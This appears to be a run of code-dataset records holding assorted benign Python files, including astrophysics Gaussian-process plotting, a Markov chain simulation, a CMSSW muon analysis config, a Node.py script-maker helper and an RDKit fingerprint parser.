Written - Bovy (NYU)\n \"\"\"\n file= fu.table_fields(filename)\n mjd_g= nu.array(file.mjd_g)/365.25\n g= nu.array(file.g)\n err_g= nu.array(file.err_g)\n mjd_r= nu.array(file.mjd_r)/365.25\n r= nu.array(file.r)\n err_r= nu.array(file.err_r)\n\n mask= (mjd_g != 0)*(g < 20.6)*(g > 19.7)#Adjust for non-g\n g= g[mask]\n g-= nu.mean(g)\n err_g= err_g[mask]\n mjd_g= mjd_g[mask]\n mjd_g-= nu.amin(mjd_g)\n meanErr_g= nu.mean(err_g)\n\n r= r[mask]\n r-= nu.mean(r)\n err_r= err_r[mask]\n mjd_r= mjd_r[mask]\n mjd_r-= nu.amin(mjd_r)\n meanErr_r= nu.mean(err_r)\n \n meanErr_gr= nu.mean(nu.sqrt(err_r**2.+err_g**2.))\n\n nu.random.seed(4)\n nGP=5\n nx=201\n params_mean= ()\n if covarType == 'SF':\n from powerlawSFgr import covarFunc\n params= {'logGamma': array([-7.33271548]), 'logGammagr': array([-10.5]), 'gamma': array([ 0.4821092]), 'gammagr': array([ 0.5])}\n params= {'logGamma': array([-7.79009776]), 'logGammagr': array([-28.0487848]), 'gamma': array([ 0.45918053]), 'gammagr': array([ 0.21333858])}\n else:\n from OUgr import covarFunc\n params= {'logl': array([ 1.94844503]), 'loglgr': array([ 7.36282174]), 'logagr2': array([ 1.0196474]), 'loga2': array([-0.00588868])}\n params= {'logl':-1.37742591,'loga':-3.47341754,\n 'loglgr': -2.3777,'logagr': -4.}\n params= {'logl': array([-1.38968195]), 'loglgr': array([-2.46684501]), 'logagr2': array([-6.62320832]), 'loga2': array([-3.52099305])}\n paramsSF= params\n cf= covarFunc(**params)\n params_covar= (cf)\n ndata= len(g)\n if constraints is None:\n listx= [(t,'g') for t in mjd_g]\n listx.extend([(t,'r') for t in mjd_r])\n listy= [m for m in g]\n listy.extend([m for m in r])\n listy= nu.array(listy)\n noise= [m for m in err_g]\n noise.extend([m for m in err_r])\n noise= nu.array(noise)\n trainSet= trainingSet(listx=listx,listy=listy,noise=noise)\n constraints= trainSet\n else:\n constraints= nu.array([])\n\n useconstraints= constraints\n txs= nu.linspace(-0.1,6.5,nx)\n xs= [(txs[ii],'g') for ii in range(nx)]\n xs.extend([(txs[ii],'r') for ii in range(nx)])\n GPsamples= eval_gp(xs,mean,covar,(),params_covar,nGP=nGP,constraints=useconstraints,tiny_cholesky=.00000001)\n thismean= calc_constrained_mean(xs,mean,params_mean,covar,params_covar,useconstraints)\n thiscovar= calc_constrained_covar(xs,covar,params_covar,useconstraints)\n #Calculate loglike\n if isinstance(constraints,trainingSet):\n (params,packing)= pack_params(cf)\n covarFuncName= inspect.getmodule(cf).__name__\n thisCovarClass= __import__(covarFuncName)\n loglike= marginalLikelihood(params,constraints,packing,\n thisCovarClass)\n\n plot.bovy_print()\n pyplot.plot(txs,GPsamples[0,:nx],'-',color='0.25')\n if isinstance(constraints,trainingSet):\n pyplot.plot(mjd_g,g,'k.',zorder=5,ms=10)\n title= re.split(r'_',basefilename)[0]\n if covarType == 'SF':\n method= '\\mathrm{power-law\\ structure\\ functions}'\n else:\n method= '\\mathrm{damped\\ random\\ walk}'\n plot.bovy_text(r'$\\mathrm{'+title+'\\ / \\ '+method+r'}$',title=True)\n if isinstance(constraints,trainingSet):\n plot.bovy_text(r'$\\log P({\\bf x}|\\mathrm{parameters}) = %5.2f$' %(-loglike),\n top_left=True)\n #pyplot.fill_between(xs,thismean-sc.sqrt(sc.diagonal(thiscovar)),thismean+sc.sqrt(sc.diagonal(thiscovar)),color='.75')\n for ii in range(1,nGP):\n pyplot.plot(txs,GPsamples[ii,:nx],'-',color=str(0.25+ii*.5/(nGP-1)))\n #pyplot.plot(txs,thismean[:nx],'k-',linewidth=2)\n if isinstance(constraints,trainingSet):\n pyplot.errorbar(6.15,-0.25,yerr=meanErr_g,color='k')\n pyplot.xlabel(r'$\\mathrm{MJD-constant}\\ [\\mathrm{yr}]$')\n pyplot.ylabel(r'$g-\\langle g\\rangle\\ [\\mathrm{mag}]$')\n pyplot.xlim(-0.1,6.5)\n pyplot.ylim(-0.6,0.6)\n plot._add_ticks()\n plot.bovy_end_print(basefilename+'_fullg.ps')\n\n\n plot.bovy_print()\n pyplot.figure()\n pyplot.plot(txs,GPsamples[0,nx-1:-1],'-',color='0.25')\n if isinstance(constraints,trainingSet):\n pyplot.plot(mjd_r,r,'k.',zorder=5,ms=10)\n #plot.bovy_text(r'$\\mathrm{'+title+'\\ / \\ '+method+r'}$',title=True)\n #pyplot.fill_between(xs,thismean-sc.sqrt(sc.diagonal(thiscovar)),thismean+sc.sqrt(sc.diagonal(thiscovar)),color='.75')\n for ii in range(1,nGP):\n pyplot.plot(txs,GPsamples[ii,nx-1:-1],'-',color=str(0.25+ii*.5/(nGP-1)))\n #pyplot.plot(txs,thismean[nx-1:-1],'k-',linewidth=2)\n if isinstance(constraints,trainingSet):\n pyplot.errorbar(6.15,-0.25,yerr=meanErr_r,color='k')\n pyplot.xlabel(r'$\\mathrm{MJD-constant}\\ [\\mathrm{yr}]$')\n pyplot.ylabel(r'$r-\\langle r\\rangle\\ [\\mathrm{mag}]$')\n pyplot.xlim(-0.1,6.5)\n pyplot.ylim(-0.6,0.6)\n plot._add_ticks()\n plot.bovy_end_print(basefilename+'_fullr.ps')\n\n\n plot.bovy_print()\n pyplot.figure()\n ii= 0\n colors= nu.array([GPsamples[ii,jj]-GPsamples[ii,jj+nx] for jj in range(nx)])\n if not isinstance(constraints,trainingSet):\n colors= colors-nu.mean(colors)\n pyplot.plot(txs,colors,'-',color='0.25')\n if isinstance(constraints,trainingSet):\n plot.bovy_plot(mjd_g,g-r,'k.',zorder=5,ms=10,overplot=True)\n #plot.bovy_text(r'$\\mathrm{'+basefilename+r'}$',title=True)\n #pyplot.fill_between(xs,thismean-sc.sqrt(sc.diagonal(thiscovar)),thismean+sc.sqrt(sc.diagonal(thiscovar)),color='.75')\n for ii in range(1,nGP):\n colors= nu.array([GPsamples[ii,jj]-GPsamples[ii,jj+nx] for jj in range(nx)])\n if not isinstance(constraints,trainingSet):\n colors= colors-nu.mean(colors)\n pyplot.plot(txs,colors,'-',color=str(0.25+ii*.5/(nGP-1)))\n plotthismean= nu.zeros(nx)\n for ii in range(nx):\n plotthismean[ii]= thismean[ii]-thismean[ii+nx]\n #pyplot.plot(txs,plotthismean,'k-',linewidth=2)\n if isinstance(constraints,trainingSet):\n pyplot.errorbar(6.15,-0.18,yerr=meanErr_gr,color='k')\n pyplot.xlabel(r'$\\mathrm{MJD-constant}\\ [\\mathrm{yr}]$')\n pyplot.ylabel(r'$g-r- \\langle g - r \\rangle\\ [\\mathrm{mag}]$')\n pyplot.xlim(-0.1,6.5)\n if isinstance(constraints,trainingSet):\n pyplot.ylim(-0.25,.25)\n else:\n pass #pyplot.ylim(-10.,10.)\n plot._add_ticks()\n plot.bovy_end_print(basefilename+'_color.ps')\n\n if covarType == 'DRW':\n return\n\n #Plot structure functions\n\n #g\n plot.bovy_print()\n pyplot.figure()\n for ii in range(nGP):\n thisSample= GPsamples[ii,:nx]\n pyplot.loglog(sc.arange(1.,len(thisSample)/2)*(txs[1]-txs[0]),\n 2.*sc.var(thisSample)\\\n -2.*sc.correlate(thisSample-sc.mean(thisSample),thisSample-sc.mean(thisSample),\"same\")[1:len(thisSample)/2][::-1]/len(thisSample),\n color=str(0.25+ii*.5/(nGP-1)))\n xline= [(txs[1]-txs[0]),txs[len(txs)/2]]\n pyplot.loglog(xline,(nu.exp(paramsSF['logGamma'])*nu.array(xline))**(paramsSF['gamma']),'k--')\n pyplot.xlabel(r'$\\Delta t\\ [\\mathrm{yr}]$')\n pyplot.ylabel(r'$\\mathrm{structure\\ function\\ in}\\ g$')\n #plot.bovy_text(r'$\\mathrm{SDSSJ203817.37+003029.8}$',title=True)\n plot.bovy_end_print(basefilename+'_structfuncg.ps')\n\n\n #r\n plot.bovy_print()\n pyplot.figure()\n for ii in range(nGP):\n thisSample= GPsamples[ii,nx-1:-1]\n pyplot.loglog(sc.arange(1.,len(thisSample)/2)*(txs[1]-txs[0]),\n 2.*sc.var(thisSample)\\\n -2.*sc.correlate(thisSample-sc.mean(thisSample),thisSample-sc.mean(thisSample),\"same\")[1:len(thisSample)/2][::-1]/len(thisSample),\n color=str(0.25+ii*.5/(nGP-1)))\n xline= [(txs[1]-txs[0]),txs[len(txs)/2]]\n pyplot.loglog(xline,(nu.exp(paramsSF['logGamma'])*nu.array(xline))**(paramsSF['gamma']),'k--')\n pyplot.xlabel(r'$\\Delta t\\ [\\mathrm{yr}]$')\n pyplot.ylabel(r'$\\mathrm{structure\\ function\\ in}\\ r$')\n #plot.bovy_text(r'$\\mathrm{SDSSJ203817.37+003029.8}$',title=True)\n plot.bovy_end_print(basefilename+'_structfuncr.ps')\n\n\n #g-r\n plot.bovy_print()\n pyplot.figure()\n for ii in range(nGP):\n thisSample= nu.array([GPsamples[ii,jj]-GPsamples[ii,jj+nx] for jj in range(nx)])\n pyplot.loglog(sc.arange(1.,len(thisSample)/2)*(txs[1]-txs[0]),\n 2.*sc.var(thisSample)\\\n -2.*sc.correlate(thisSample-sc.mean(thisSample),thisSample-sc.mean(thisSample),\"same\")[1:len(thisSample)/2][::-1]/len(thisSample),\n color=str(0.25+ii*.5/(nGP-1)))\n xline= [(txs[1]-txs[0]),txs[len(txs)/2]]\n pyplot.loglog(xline,(nu.exp(paramsSF['logGammagr'])*nu.array(xline))**(paramsSF['gammagr']),'k--')\n pyplot.xlabel(r'$\\Delta t\\ [\\mathrm{yr}]$')\n pyplot.ylabel(r'$\\mathrm{color\\ structure\\ function}$')\n #plot.bovy_text(r'$\\mathrm{SDSSJ203817.37+003029.8}$',title=True)\n plot.bovy_end_print(basefilename+'_structfuncgr.ps')\n\nif __name__ == '__main__':\n if len(sys.argv) > 2:\n if 'like' in sys.argv[1]:\n constraints=[]\n else:\n constraints= None\n dualBandExample(covarType=sys.argv[2],basefilename=sys.argv[1],constraints=constraints)\n elif len(sys.argv) > 1:\n if 'like' in sys.argv[1]:\n constraints=[]\n else:\n constraints= None\n dualBandExample(basefilename=sys.argv[1],constraints=constraints)\n else:\n dualBandExample()\n","sub_path":"RC/fakedatagen/vq/dualBandExample.py","file_name":"dualBandExample.py","file_ext":"py","file_size_in_byte":10560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"615167059","text":"\"\"\"\ntime:0(n)\nspace:o(n)\n\"\"\"\nclass Solution(object):\n def reorderLogFiles(self, logs):\n \"\"\"\n :type logs: List[str]\n :rtype: List[str]\n \"\"\"\n let_logs = [] #maintaing letter and digit logs separately\n dig_logs = []\n\n for i in range (0,len(logs)):\n ne = logs[i].split()\n \n if(ne[1].isnumeric()):\n dig_logs.append(str(logs[i]))\n \n else:\n let_logs.append(str(logs[i]))\n \n let_logs.sort(key = lambda x: x.split()[0]) #first sort through their ids for letter logs, then through the string\n let_logs.sort(key = lambda x: x.split()[1:])\n \n res = let_logs + dig_logs \n \n return res","sub_path":"Problem2.py","file_name":"Problem2.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"272239567","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom time import time\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\nclass MarkovChainType:\n\n def __init__(self, _alpha, _beta, _size):\n self.alpha_ = _alpha\n self.beta_ = _beta\n self.size_ = _size\n self.data_ = -0.5*np.ones(_size)\n self.step_ = .0\n self.p1_ = []\n self.p2_ = []\n\n def do_step_(self):\n for i in range(self.size_):\n if self.data_[i] < 0:\n if np.random.uniform() < self.alpha_:\n self.data_[i] += 1\n else:\n if np.random.uniform() < self.beta_:\n self.data_[i] -= 1\n\n def walk(self, _steps):\n while self.step_ < _steps:\n self.do_step_()\n temp, opt = np.histogram(self.data_, bins=[-1,0,1])\n self.p1_.append(temp[0]/self.size_)\n self.p2_.append(temp[1]/self.size_)\n self.step_ += 1\n del opt\n del temp\n\n def plotFigure(self, _file_name, _a,_b):\n plt.figure()\n plt.semilogx(np.arange(1.0, self.step_+1.0, 1.0), self.p1_, label= \"State 1\")\n plt.semilogx(np.arange(1.0, self.step_+1.0, 1.0), self.p2_, label= \"State 2\")\n plt.legend()\n plt.grid()\n plt.ylim(0.0,1.0)\n plt.title(r\"$\\alpha$ = {0: .2f}, $\\beta$ = {1:.2f}\".format(_a, _b))\n plt.xlabel(r\"numbers of steps \\(n\\)\")\n plt.ylabel(r\"probability \\(P\\)\")\n plt.tight_layout()\n plt.savefig(_file_name)\n plt.close()\n\ndef main():\n np.random.seed(int(time()))\n alpha_list = np.append(np.linspace(0.2, 0.8, 1),[0.01])\n beta_list = np.append(np.linspace(0.2, 0.8, 1),[0.01])\n a, b = np.meshgrid(alpha_list, beta_list)\n for i in range(len(alpha_list)):\n for j in range(len(beta_list)):\n s = MarkovChainType(a[i][j], b[i][j], 1000)\n s.walk(1000)\n alpha_label= int(a[i][j]*10)\n beta_label= int(b[i][j]*10)\n s.plotFigure(\"fig2_a_{0:d}_b_{1:d}.png\".format(alpha_label,beta_label), a[i][j], b[i][j] )\n del s\n return 0\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"CP2__Computational_Physics_II/Soluciones de Li/Computational-Physics-II-master/assignment_04/codes/4_2_markov_chain_dynamics.py","file_name":"4_2_markov_chain_dynamics.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"538884824","text":"\"\"\"\nIf we want to write a file, then we need to change the file mode to\n'w' which means writting files,\n'wb' which means writting-binary files.\nSpecial Note: When using “w” or “wb” modes, if the file already exists,\nit will be overwritten with no warning!\nWe can check if a file already exists before open by using on module.\n\"\"\"\n\nhandle = open(\"test.txt\", \"w\")\nhandle.write(\"This is a test!\")\n# We call the 'write' method to write some text to the file.\n# also we can use 'writelines' method that will accept a list of strings\n# that the handle will then write to disk in order.\nhandle.close() # always close the file after action\n\n# Now let's read the file that we just wrote\nhandle = open(\"test.txt\", \"r\")\nfor line in handle:\n print(line)\nhandle.close()\n\n\n\"\"\"\nPython has a neat little builtin called with which we can use to simplify\nreading and writing files. The with operator creates what is known as a\ncontext manager in Python that will automatically close the file\nwhen we are done processing it.\n\"\"\"\nwith open(\"test.txt\") as file_handler:\n for line in file_handler:\n print(line)\n\n\"\"\"\nWhat are we doing is \"handle = open(\"test.txt\")\" is replacing with\n\"with open(\"test.txt\") as file_handler:\"\nWe can do all usual I/O operations as we normally do with with code block.\nIf we leave the code block, the file will close and we can't use them anymore.\n'with' clause does it automaticlly.\n\"\"\"\n","sub_path":"day6/2_writting_file.py","file_name":"2_writting_file.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"549923746","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n* Copyright (c) 2018 GIORGIO CACULLI \n*\n* Permission to use, copy, modify, and distribute this software for any\n* purpose with or without fee is hereby granted, provided that the above\n* copyright notice and this permission notice appear in all copies.\n*\n* THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n* WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\"\"\"\nfrom meacore.modele import Modele\n\nclass ModeleC(Modele):\n def __init__(self, fiche_1, fiche_2, methode):\n self.vnut_1 = fiche_1.get_energie()\n self.pp_1 = fiche_1.get_proteines()\n self.pg_1 = fiche_1.get_glucides()\n self.pl_1 = fiche_1.get_lipides()\n self.vnut_2 = fiche_2.get_energie()\n self.pp_2 = fiche_2.get_proteines()\n self.pg_2 = fiche_2.get_glucides()\n self.pl_2 = fiche_2.get_lipides()\n self.methode = methode\n self.calculate_kcx(self.get_kcl(), 0, self.get_kcp())\n\n def calculate_kcl(self, methode):\n if methode == 1:\n step1 = (self.vnut_1 * self.pp_2) + (self.vnut_2 * self.pp_1)\n step2 = (self.pl_1 * self.pp_2) - (self.pl_2 * self.pp_1)\n return step1 / step2\n elif methode == 2:\n step1 = (self.vnut_1 * self.pp_2) + (self.vnut_2 * self.pp_1)\n step2 = (self.pl_1 * self.pp_2) - (self.pl_2 * self.pp_1)\n return step1 / step2\n elif methode == 3:\n step1 = self.vnut_1 - (self.get_kcp() * self.pp_1)\n step2 = self.pl_1\n return step1 / step2\n elif methode == 4:\n step1 = self.vnut_2 - (self.get_kcp() * self.pp_2)\n step2 = self.pl_2\n return step1 / step2\n\n def calculate_kcp(self, methode):\n if methode == 1:\n step1 = self.vnut_1 - (self.get_kcl() * self.pl_1)\n step2 = self.pp_1\n return step1 / step2\n elif methode == 2:\n step1 = self.vnut_2 - (self.get_kcl() * self.pl_2)\n step2 = self.pp_2\n return step1 / step2\n elif methode == 3:\n step1 = (self.vnut_1 * self.pl_2) + (self.vnut_2 * self.pl_1)\n step2 = (self.pp_1 * self.pl_2) - (self.pp_2 * self.pl_1)\n return step1 / step2\n elif methode == 4:\n step1 = (self.vnut_1 * self.pl_2) + (self.vnut_2 * self.pl_1)\n step2 = (self.pp_1 * self.pl_2) - (self.pp_2 * self.pl_1)\n return step1 / step2\n\n def set_methode(self, methode):\n self.methode = methode\n\n def get_methode(self):\n return self.methode\n\n def get_kcl(self):\n return self.calculate_kcl(self.get_methode())\n\n def get_kcp(self):\n return self.calculate_kcp(self.get_methode())\n\n def calculate_kcx(self, kcl, kcg, kcp):\n if self.get_methode() == 1 or self.get_methode() == 2:\n self.set_kcl(kcl)\n self.set_kcp(kcp)\n elif self.get_methode() == 3 or self.get_methode() == 4:\n self.set_kcp(kcp)\n self.set_kcl(kcl)\n self.set_kcg(kcg)\n\n\n","sub_path":"meacore/modele_c.py","file_name":"modele_c.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"346482271","text":"def detect_anagrams(word, candidates):\n wordlist=list(word.lower())\n vcandidates=[]\n for words in candidates:\n \tif word.lower()==words.lower():\n \t\tcontinue\n \telse:\n \t\ttemp=wordlist[:]\n \t\tif len(words)==len(wordlist):\n \t\t\tfor i in range(len(words)):\n \t\t\t\tif words[i].lower() in temp:\n \t\t\t\t\ttemp.remove(words[i].lower())\n \t\tif len(temp)==0 :\n \t\t\tvcandidates.append(words)\n return vcandidates\n","sub_path":"anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"351441389","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"MuonExercise2\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\n# initialize MessageLogger and output report\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1000\nprocess.MessageLogger.cerr.threshold = 'INFO'\nprocess.MessageLogger.cerr.INFO = cms.untracked.PSet(\n limit = cms.untracked.int32(0)\n)\n\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc', '')\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\nprocess.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(False),\nSkipEvent = cms.untracked.vstring('ProductNotFound'))\n\nprocess.source = cms.Source(\"PoolSource\", fileNames = cms.untracked.vstring('file:/eos/user/c/cmsdas/short-exercises/muon/dymm_2.root'))\n\nprocess.demo = cms.EDAnalyzer(\"MuonExercise2\",\n MuonTag = cms.InputTag(\"slimmedMuons\"),\n GenPartTag = cms.InputTag(\"prunedGenParticles\"),\n UseRochCorr = cms.untracked.bool(False),\n RndmSeed = cms.untracked.uint32(2345)\n)\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('histos2.root')\n)\n\nprocess.p = cms.Path(process.demo)\n","sub_path":"CMSSW_10_6_8/src/MuonExercises/MuonExercises2/MuonExercise2.py","file_name":"MuonExercise2.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"545996597","text":"# Copyright (c) 2017 Niklas Rosenstein\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\"\"\"\nHelper function to create script files for pure Python code, ppy modules or\nshell commands. Uses the Python #distlib package.\n\"\"\"\n\nimport os\nimport six\ntry:\n from distlib.scripts import ScriptMaker as _ScriptMaker\nexcept ImportError as exc:\n from pip._vendor.distlib.scripts import ScriptMaker as _ScriptMaker\n\nargschema = require('../argschema')\n\n\nclass ScriptMaker:\n \"\"\"\n Our own script maker class. It is unlike #distutils.script.ScriptMaker.\n \"\"\"\n\n def __init__(self, directory):\n self.directory = directory\n self.path = []\n self.pythonpath = []\n\n def _init_code(self):\n if not self.path and not self.pythonpath:\n return ''\n code = '# Initialize environment variables (from ScriptMaker).\\nimport os,sys\\n'\n if self.path:\n path = [os.path.abspath(x) for x in self.path]\n code += 'os.environ[\"PATH\"] = os.pathsep.join({path!r}) + '\\\n 'os.pathsep + os.environ.get(\"PATH\", \"\")\\n'.format(path=path)\n if self.pythonpath:\n path = [os.path.abspath(x) for x in self.pythonpath]\n code += '_add_pythonpath = {pythonpath!r}\\n'\\\n 'sys.path.extend(_add_pythonpath); del _add_pythonpath\\n'.format(pythonpath=path)\n return code + '\\n'\n\n def make_python(self, script_name, code):\n \"\"\"\n Uses #distlib.scripts.ScriptMaker to create a Python script that is invoked\n with this current interpreter. The script runs *code* and will be created\n in the *directory* specified in the constructor of this #ScriptMaker.\n\n # Parameters\n script_name (str): The name of the script to create.\n code (str): The python code to run.\n\n # Returns\n A list of filenames created. Depending on the platform, more than one file\n might be created to support multiple use cases (eg. and `.exe` but also a\n bash-script on Windows).\n \"\"\"\n\n if os.name == 'nt' and (not script_name.endswith('.py') \\\n or not script_name.endswith('.pyw')):\n # ScriptMaker._write_script() will split the extension from the script\n # name, thus if there is an extension, we should add another suffix so\n # the extension doesn't get lost.\n script_name += '.py'\n\n maker = _ScriptMaker(None, self.directory)\n maker.clobber = True\n maker.variants = set(('',))\n maker.set_mode = True\n maker.script_template = self._init_code() + code\n return maker.make(script_name + '=isthisreallynecessary')\n\n def make_command(self, script_name, args):\n \"\"\"\n Uses #make_python() to create a Python script that uses the #subprocess\n module to run the command specified with *args*.\n \"\"\"\n\n code = 'import sys, subprocess\\n'\\\n 'sys.exit(subprocess.call({!r}))\\n'.format(args)\n return self.make_python(script_name, code)\n\n def make_nodepy(self, script_name, filename, reference_dir=None):\n \"\"\"\n Uses #make_pyton() to create a script that invokes the current Python and\n Node.py runtime to run the Node.py module specified by *filename*. If a\n *reference_dir* is specified, that directory will be used as a the base\n directory to start searching for `nodepy_modules/` directories instead of\n the current working directory.\n \"\"\"\n\n args = ['--keep-arg0']\n if reference_dir:\n # Find modules in the reference directory.\n args.append('--current-dir')\n args.append(reference_dir)\n args.append(filename)\n\n code = 'import sys, nodepy;\\n'\\\n 'sys.argv = [sys.argv[0]] + {args!r} + sys.argv[1:]\\n'\\\n 'sys.exit(nodepy.main())\\n'.format(args=args)\n return self.make_python(script_name, code)\n\n def make_wrapper(self, script_name, target_program):\n \"\"\"\n Creates a Python wrapper script that will invoke *target_program*. Before\n the program is invoked, the environment variables PATH and PYTHONPATH will\n be prefixed with the paths from *path* and *pythonpath*.\n \"\"\"\n\n if not os.path.isabs(target_program):\n raise ValueError('target_program must be an absolute path')\n\n code = 'import subprocess, sys\\n'\\\n 'sys.exit(subprocess.call([{program!r}] + sys.argv[1:]))\\n'\\\n .format(program=target_program)\n return self.make_python(script_name, code)\n","sub_path":"lib/util/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"154877899","text":"from Calculator.Square import squaring\nfrom Calculator.Division import division\nfrom Statistics.Mean import mean\n\ndef samplevariance(a):\n try:\n a_mean = mean(a)\n n = len(a)\n x = 0\n for i in a:\n x = x + squaring(i-a_mean)\n return round(division(x, (n-1)), 7)\n except ZeroDivisionError:\n print(\"Error: Can't Divide by 0\")\n except ValueError:\n print (\"Error: Check your data inputs\")","sub_path":"Statistics/SampleVariance.py","file_name":"SampleVariance.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"185749502","text":"import pandas as pd\nimport os\nimport numpy as np\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\nimport pickle\nimport pubchempy\n\nPATH = '.'\nfingerprints = os.path.join(PATH, 'Fingerprints')\ndata_csv = 'Information_Files\\\\enamine.csv' \n\nclass dmso:\n \"\"\"\n Class used to easily parse dmso data set into fingerprints and one-hot encoded\n categorical labels\n \"\"\"\n def __init__(self):\n self.mapping = None\n self.data = None\n\n def obtain_data(self, morgan=False, maccs=False, pubchem=False,\n categorical_to_onehot=True, nbits = 1024):\n \"\"\"\n The meat and cheese!\n Opens the data set and transforms it as desired.\n :param fingerprint: Set to False to prevent smiles -> fingerprint conversion\n :param categorical_to_onehot: Set to False to prevent label strings -> one hot conversion\n :return: Stores\n \"\"\"\n self.nbits = nbits\n self.data = pd.read_csv(data_csv)\n if categorical_to_onehot:\n self.mapping = self.one_hot(self.data['Solubility'])\n self.data['Solubility'] = self.data['Solubility'].map(self.mapping)\n if morgan:\n self.data['fingerprints'] = self.data['SMILES'].apply(self.morgan)\n elif maccs:\n self.data['fingerprints'] = self.data['SMILES'].apply(self.maccs)\n elif pubchem:\n self.data['fingerprints'] = self.data['SMILES'].apply(self.pubchem)\n\n def one_hot(self, column):\n \"\"\"\n One hot encodes a column of arbitrary categories\n :param column: a pandas dataframe\n :return: a dict mapping each category to its respective list\n ex: for the two categories ['Soluble', 'Insoluble'] this function will return\n {'Soluble':array([0,1]), 'Insoluble': array([1,0])}\n \"\"\"\n values = set(column)\n values = sorted(list(values))\n ints = [c for c, _ in enumerate(values)]\n number_values = len(values)\n int_map = {a: ints[c] for c, a in enumerate(values)}\n for thingy in int_map:\n zeroes = np.zeros(number_values, dtype='int32')\n zeroes[int_map[thingy]] = 1\n int_map[thingy] = zeroes\n return int_map\n\n def morgan(self, column):\n x = Chem.MolFromSmiles(column)\n y = list(AllChem.GetMorganFingerprintAsBitVect(x, 2, self.nbits))\n return y\n\n def maccs(self, column):\n x = Chem.MolFromSmiles(column)\n y = list(AllChem.GetMACCSKeysFingerprint(x))\n return y\n\n def pubchem(self, column):\n try:\n x = pubchempy.get_compounds(column, namespace='smiles')[0].cactvs_fingerprint\n y = list(x)\n except:\n print('lol')\n return None\n return y\n\nif __name__== '__main__':\n nbits = 1024\n if 'morgan_{}_df.p'.format(nbits) not in os.listdir(fingerprints):\n x = dmso()\n x.obtain_data(morgan=True, nbits=nbits)\n print('done yo')\n pickle.dump(x.data, open('Fingerprints\\\\morgan_df_{}.p'.format(nbits), 'wb+'))\n \n del x\n if 'maccs_df.p' not in os.listdir(os.getcwd()):\n x = dmso()\n x.obtain_data(maccs=True)\n pickle.dump(x.data, open('Fingerprints\\\\maccs_df.p', 'wb+'))\n\n del x\n if 'pubchem_df.p' not in os.listdir(os.getcwd()):\n x = dmso()\n x.obtain_data(pubchem=True)\n pickle.dump(x, open('pubchem_df.p', 'wb+'))\n\n\n\n\n\n\n\n\n\n","sub_path":"data_parse.py","file_name":"data_parse.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"46041364","text":"#!/usr/bin/python3\n\nimport pandas as pd\n\nfrom db.pg_constants import DB_CONFIG_SECTION, DB_CONFIG_ABS_PATH, DB_SCHEMA\nfrom db.pg_engine import MyDb\nfrom db.pg_tables import companyprofile_tables, psc_tables\nfrom 